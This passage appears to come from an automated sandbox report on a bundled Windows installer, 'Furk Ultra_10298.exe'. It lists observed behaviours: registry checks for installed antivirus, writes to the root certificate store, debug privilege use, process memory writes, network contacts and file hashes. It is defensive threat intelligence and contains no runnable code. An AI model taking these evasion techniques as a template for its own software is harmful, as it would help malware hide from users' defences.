N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\setup10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.exe N/A

Checks for any installed AV software in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast\Version C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVAST Software\Avast\Version C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVAST Software\Avast C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV\Dir C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVG\AV\Dir C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVG\AV C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A

Checks installed software on the system

discovery

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1748 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe C:\Users\Admin\AppData\Local\setup10298.exe
PID 1748 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe C:\Users\Admin\AppData\Local\setup10298.exe
PID 1748 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe C:\Users\Admin\AppData\Local\setup10298.exe
PID 1748 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe C:\Users\Admin\AppData\Local\setup10298.exe
PID 1748 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe C:\Users\Admin\AppData\Local\setup10298.exe
PID 1748 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe C:\Users\Admin\AppData\Local\setup10298.exe
PID 1748 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe C:\Users\Admin\AppData\Local\setup10298.exe
PID 536 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\setup10298.exe C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe
PID 536 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\setup10298.exe C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe
PID 536 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\setup10298.exe C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe
PID 536 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\setup10298.exe C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe
PID 536 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\setup10298.exe C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe
PID 536 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\setup10298.exe C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe
PID 536 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\setup10298.exe C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe
PID 1748 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe C:\Users\Admin\AppData\Local\setup10298.exe
PID 1748 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe C:\Users\Admin\AppData\Local\setup10298.exe
PID 1748 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe C:\Users\Admin\AppData\Local\setup10298.exe
PID 1748 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe C:\Users\Admin\AppData\Local\setup10298.exe
PID 1748 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe C:\Users\Admin\AppData\Local\setup10298.exe
PID 1748 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe C:\Users\Admin\AppData\Local\setup10298.exe
PID 1748 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe C:\Users\Admin\AppData\Local\setup10298.exe
PID 840 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\setup10298.exe C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.exe
PID 840 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\setup10298.exe C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.exe
PID 840 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\setup10298.exe C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.exe
PID 840 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\setup10298.exe C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.exe
PID 840 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\setup10298.exe C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.exe
PID 840 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\setup10298.exe C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.exe
PID 840 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\setup10298.exe C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.exe

Processes

C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe

"C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe"

C:\Users\Admin\AppData\Local\setup10298.exe

C:\Users\Admin\AppData\Local\setup10298.exe hhwnd=459038 hreturntoinstaller hextras=id:3edef7f19b9beb4-US-j0AgN

C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe

.\GenericSetup.exe hhwnd=459038 hreturntoinstaller hextras=id:3edef7f19b9beb4-US-j0AgN

C:\Users\Admin\AppData\Local\setup10298.exe

C:\Users\Admin\AppData\Local\setup10298.exe hready

C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.exe

.\GenericSetup.exe hready

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 www.dlsft.com udp
N/A 35.190.60.70:443 www.dlsft.com tcp
N/A 8.8.8.8:53 dlsft.com udp
N/A 35.190.60.70:80 dlsft.com tcp
N/A 35.190.60.70:80 dlsft.com tcp
N/A 8.8.8.8:53 filedm.com udp
N/A 188.114.96.0:443 filedm.com tcp
N/A 8.8.8.8:53 flow.lavasoft.com udp
N/A 8.8.8.8:53 sos.adaware.com udp
N/A 104.18.88.101:443 flow.lavasoft.com tcp
N/A 104.16.236.79:443 sos.adaware.com tcp
N/A 104.16.236.79:443 sos.adaware.com tcp
N/A 35.190.60.70:80 dlsft.com tcp

Files

memory/1748-54-0x0000000075D01000-0x0000000075D03000-memory.dmp

\Users\Admin\AppData\Local\setup10298.exe

MD5 369acf60d8b5ed6168c74955ee04654f
SHA1 1753fff63efa6ed5ad30ede6b959261ac67dd13e
SHA256 3ff8ec8f9f27a27f414a90bfed5b7f5a3c118b33cf0f80aeb7026e0a53e26632
SHA512 2582b3b4525321fece978710403e4bd4dd6e9f0869de1fec784e4e79ac98e8c6498a601c9db45d5af4f1b99e3a2cc07b9e3ec18144e18ce82b41eb64ce4eb643

memory/536-56-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\setup10298.exe

MD5 369acf60d8b5ed6168c74955ee04654f
SHA1 1753fff63efa6ed5ad30ede6b959261ac67dd13e
SHA256 3ff8ec8f9f27a27f414a90bfed5b7f5a3c118b33cf0f80aeb7026e0a53e26632
SHA512 2582b3b4525321fece978710403e4bd4dd6e9f0869de1fec784e4e79ac98e8c6498a601c9db45d5af4f1b99e3a2cc07b9e3ec18144e18ce82b41eb64ce4eb643

C:\Users\Admin\AppData\Local\setup10298.exe

MD5 369acf60d8b5ed6168c74955ee04654f
SHA1 1753fff63efa6ed5ad30ede6b959261ac67dd13e
SHA256 3ff8ec8f9f27a27f414a90bfed5b7f5a3c118b33cf0f80aeb7026e0a53e26632
SHA512 2582b3b4525321fece978710403e4bd4dd6e9f0869de1fec784e4e79ac98e8c6498a601c9db45d5af4f1b99e3a2cc07b9e3ec18144e18ce82b41eb64ce4eb643

\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe

MD5 85b0a721491803f8f0208a1856241562
SHA1 90beb8d419b83bd76924826725a14c03b3e6533f
SHA256 18be33f7c9f28b0a514f3f40983f452f476470691b1be4f2aba5ba5e06c6a345
SHA512 8ff86e4b4d9cb5e2e88826a822457cb863262e3b73645c0c3309f13fb496997e53005ebe1825c6f92463c6642ec9abc6bbe359b35410b0621649b8d3aaf66c71

memory/1800-61-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe

MD5 85b0a721491803f8f0208a1856241562
SHA1 90beb8d419b83bd76924826725a14c03b3e6533f
SHA256 18be33f7c9f28b0a514f3f40983f452f476470691b1be4f2aba5ba5e06c6a345
SHA512 8ff86e4b4d9cb5e2e88826a822457cb863262e3b73645c0c3309f13fb496997e53005ebe1825c6f92463c6642ec9abc6bbe359b35410b0621649b8d3aaf66c71

C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe.config

MD5 fd63ee3928edd99afc5bdf17e4f1e7b6
SHA1 1b40433b064215ea6c001332c2ffa093b1177875
SHA256 2a2ddbdc4600e829ad756fd5e84a79c0401fa846ad4f2f2fb235b410e82434a9
SHA512 1925cde90ee84db1e5c15fa774ee5f10fa368948df7643259b03599ad58cfce9d409fd2cd752ff4cbca60b4bbe92b184ff92a0c6e8b78849c4497d38266bd3b4

C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe

MD5 85b0a721491803f8f0208a1856241562
SHA1 90beb8d419b83bd76924826725a14c03b3e6533f
SHA256 18be33f7c9f28b0a514f3f40983f452f476470691b1be4f2aba5ba5e06c6a345
SHA512 8ff86e4b4d9cb5e2e88826a822457cb863262e3b73645c0c3309f13fb496997e53005ebe1825c6f92463c6642ec9abc6bbe359b35410b0621649b8d3aaf66c71

memory/1800-66-0x00000000012C0000-0x00000000012CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.LastScreen.dll

MD5 3319432d3a694a481f5672fa9eb743d0
SHA1 99bff8f4941eb3cee3e0a7cb86b89eda1df07bf9
SHA256 768b4eb487e2dc8bcb8ec6221734ca69dce7f522d7640cc2a547f95296509693
SHA512 7f2a1c6c8d9d135b9e00e04f715c9b6b8ba12cb317f7b78ee3efbe3e426a99afce022306eb5bf02fe51c13857d3943b2b009b10b9cc96683e6bcbca1f9045c7f

\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.LastScreen.dll

MD5 3319432d3a694a481f5672fa9eb743d0
SHA1 99bff8f4941eb3cee3e0a7cb86b89eda1df07bf9
SHA256 768b4eb487e2dc8bcb8ec6221734ca69dce7f522d7640cc2a547f95296509693
SHA512 7f2a1c6c8d9d135b9e00e04f715c9b6b8ba12cb317f7b78ee3efbe3e426a99afce022306eb5bf02fe51c13857d3943b2b009b10b9cc96683e6bcbca1f9045c7f

\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.LastScreen.dll

